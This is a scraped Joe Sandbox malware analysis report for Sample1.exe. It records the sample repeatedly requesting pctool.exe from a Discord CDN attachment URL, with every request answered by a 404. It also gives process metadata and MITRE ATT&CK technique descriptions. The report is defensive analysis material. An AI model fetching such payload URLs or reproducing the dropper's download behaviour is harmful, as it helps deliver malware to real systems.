2025-01-15 14:15:06 UTC	1045	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:15:06 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=sqJDc229BkR2w.8Lc4UVSLRoelW_zGVGixuS1Uled94-1736950506-1.0.1.1-kg9tXd96gWeIHELpDUrDrXTlg8aPUgdo5.bk6lMbMi0ukR2pe6zBD5pR242kz3rGXo9AGGNXJCfInrA6hZALDQ; path=/; expires=Wed, 15-Jan-25 14:45:06 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HrBLyWtJso86rTuBcwf%2FrJZtbUewUSoCzFXNPacIq53E52P2JdqbzGeW5Oe2uXKO%2FmwPiGABI9mwHqpnVHeHUnOmtv05x8O5DvUuteifjV1gwPAGQY9LwwyEHUAAAAuyIlHsg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=l8DnrFJAAt3snnz.CpHQDghv.rOvs4KM92dflfx_5t4-1736950506295-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902679d83a1d8cb4-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:15:06 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.25	49784	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:15:11 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:15:11 UTC	1049	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:15:11 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=7C8uFhVggI7jV3WOLrRi7w9oemH4ArLnxxJiuFk3cyE-1736950511-1.0.1.1-cKfwIGTk8NQy3ll7o2llj9DdElzU7Vv4qt8kNMd_wZ81m.kpX.xcM_95dPVkiDWu.R2Xnp451.FVRsDMnAdKXw; path=/; expires=Wed, 15-Jan-25 14:45:11 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VJt%2Bl5gF9I69aNJqgcBjU%2F2gTbdaTkBofa7qHz0KCu81O%2FmsZOPcHatoggmB7yZKv0RoUusJ9rcraw9xdDrG72GDP79CWKT2fSl04Ob43ZV6LdQLwJk%2BH0Hs9XjDAAN040b63g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=T_cXJmGzgW2wH3Et76Q8YMn_cTgAHbjSEsnX46latIo-1736950511918-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902679fb5d168ccd-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:15:11 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.25	49785	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:15:17 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:15:17 UTC	1057	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:15:17 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=VJ7shNHkaGlzY1W6oivzuutyFj.7gU3hdE2oIqfz8aA-1736950517-1.0.1.1-kv17TfpPtDhYclVlF2SRAROO9Tqv1GNvobOsSxif_9zvv0Sil0UBISSJ8x_Ove_IKFT69rEANVZGgeuyqZCUDg; path=/; expires=Wed, 15-Jan-25 14:45:17 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CcStBeBOC8vSpmOWF4i0uSSbFYO%2F0d9YeN7SrjT97%2FcFSxN9g7XDF6wHhDgykjQ%2BiTuK5x1OBEipr5%2Bwm%2BV8OpF5LQGbXf%2BrUdi9tXX5K2i%2FK2YsD6t0mvcH5H%2BlyYdcMXjVHQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=6vp.z3ecvr27foPGDgTQoChsZsE7PuqEet9bBZT9z5M-1736950517528-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 90267a1e7c5d0fa9-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:15:17 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.25	49786	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:15:23 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:15:23 UTC	1045	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:15:23 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=w96CmVd0buiWjMYYU_mAB1zNeyxpKeZnanh2JmsDa_4-1736950523-1.0.1.1-9_UaVEg2jseA9gyY2pw5k2yjIYkmrUOehVMhuL_mIAC0hhdTu27I4qPP_Dz9dSFk8DSX_KQ4R8LUeOrYM0Iihw; path=/; expires=Wed, 15-Jan-25 14:45:23 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Coy0I6l9HfcYMZ9aJfmyhxCLjqg5Bx1TELCmkTQOIzgGzK%2F8MuLQE0rMXlOGjEzdquGv5Wz2VVhm3HU9XTSQLkdACCo%2F1ZGb3CSjUy4c7uYapEe1wPt4dnBwfMF72MKgkG8mBw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=yEIxL6b39pMnYOO8kNfkIKxu1Pi11Bnfhv1oLOMaI.8-1736950523193-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 90267a41c9660f42-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:15:23 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.25	49788	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:15:28 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:15:28 UTC	1047	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:15:28 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=TqNMHq.1qQTgCL4oYVk1hvy0rUScrizuOMpm9FTR0W0-1736950528-1.0.1.1-cgzOgUUBwlzsCuS6Ekxkjj2GVz1x.Fkl5jEgM.vzkjWOKYivl1av.JqjHUROiA36AzPaVrZzOXiWEmNNaNYHmg; path=/; expires=Wed, 15-Jan-25 14:45:28 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QkDtbvjp29Y4dFxEDyAtn1GUiczT3GBEMgZUAJ9Gz%2Fus15ITjHG2ydb4DKJy6U69V%2B4HuxJkppGrDoJ6t5mICUdXerAW0xG4X%2BbrtejOQWVpGG0rTCucilOs9BiAcHd4zIbwfg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=FL6pkqMdrTkNhmtz9tt1.jbCH0wjTS02soY.jRSWV8I-1736950528851-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 90267a6538e443d6-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:15:28 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.25	49790	162.159.129.233	443

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:15:37 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:15:37 UTC	1053	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:15:37 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=91gSsXwlXihARGfUsEHuAB.36GgiyQXwic21QMGRKg0-1736950537-1.0.1.1-RyanWDg.TmqUktHQawF_ptI9r._k15yoGeP9oUsM9JSjk_HwidHGJt_KsvJQ4JpAKFobn4CWrVs1W5qlOnNNcg; path=/; expires=Wed, 15-Jan-25 14:45:37 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z0dIcaP5gRn85%2Bp%2BX8M5vl3HhBDeRLkep9PFty1mChVLDIGlMZLwvFlm%2B0dEKzwJJRRpU245w7pfyS%2BtKZTZ0mwn3Af2Yn%2BewUNJIp95wfnXtbsvqXov%2BtCg91LeMjg01Q81Uw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=XAjFlnv2Z.ta.Qh6.3hkLByjZBY16WKV95Zcm1HkGZY-1736950537171-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 90267a992df84244-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:15:37 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.25	49791	162.159.129.233	443

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:15:42 UTC	104	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com
2025-01-15 14:15:42 UTC	1047	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:15:42 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=WP5CpJ464xp7g8vIbW.Ec87avU7kj9IEd4QpoqcHhc4-1736950542-1.0.1.1-jQSkuRC7Ezf3PBLm7dSK83m4QBoTaB5Z_gHqvjpbN5.yuJ3.fCDbejhvGIh7yBkt5M3VlI6cCBViqY9cKSCy3g; path=/; expires=Wed, 15-Jan-25 14:45:42 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pJhadYMNB%2FTOQWFc19e1d5qEnmJWFCGhFODkiViNazikVXBQdkER241AKo%2BxoCu6Vo4WZdOxjQR%2BCdjnUFITtbaYPaW1eDzFiz6j1eKZJWg7xdqoNcGH8rllCw0oV6z3bY9kQQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=AI2ut1RvU.6YkR5bizgjQl0YAgnwdxLynpgCyv1RDDQ-1736950542756-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 90267abc29f68c72-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:15:42 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.25	49792	162.159.129.233	443

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:15:48 UTC	104	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com
2025-01-15 14:15:48 UTC	1055	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:15:48 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=DtpP3vpbfFDqdQk7b_TPK5fMz5sQcdy9nHoIx8mhQZo-1736950548-1.0.1.1-pCLQxVxM_.5_Pqci1SFOSd0AOw41MJRJld8nmf3E8pFNl2cxFvAOWD4TOT__PhrBEHaPwE5aR4A.qw9oKmN9vA; path=/; expires=Wed, 15-Jan-25 14:45:48 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=woT4obMTuoIVVptadG6ioEE%2B0LQgpULnI6WDy8VbhYlIFH8FaTEy5ItV3J%2F%2BmwqMNhU%2BZlrHAUWo7862NhwqqBGRWFwmXn4%2BhtOlyp%2Bjy0OUZR7l6FI6FhI1mPB1lc8VL%2BZnYA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=.ipEcSFjk5s1DH8Dkn_UuPOMMkXa3OokcIyuDLt9dEQ-1736950548364-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 90267adf2ac98cc3-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:15:48 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Sample1.exePID: 7448, Parent PID: 4056

General

Target ID:	0
Start time:	09:11:23
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\Sample1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Sample1.exe"
Imagebase:	0x10000
File size:	8'192 bytes
MD5 hash:	45A47D815F2291BC7FC0112D36AAAD83
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: SystemSettingsBroker.exePID: 1160, Parent PID: 836

General

Target ID:	40
Start time:	09:14:19
Start date:	15/01/2025
Path:	C:\Windows\System32\SystemSettingsBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\SystemSettingsBroker.exe -Embedding
Imagebase:	0x7ff6baff0000
File size:	220'536 bytes
MD5 hash:	899E65893CDEE7F9022DC9B583F94F0F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to lowest risk score due to lack of data" ] }
Date: unknown

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Sample1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Windows Analysis Report
Sample1.exe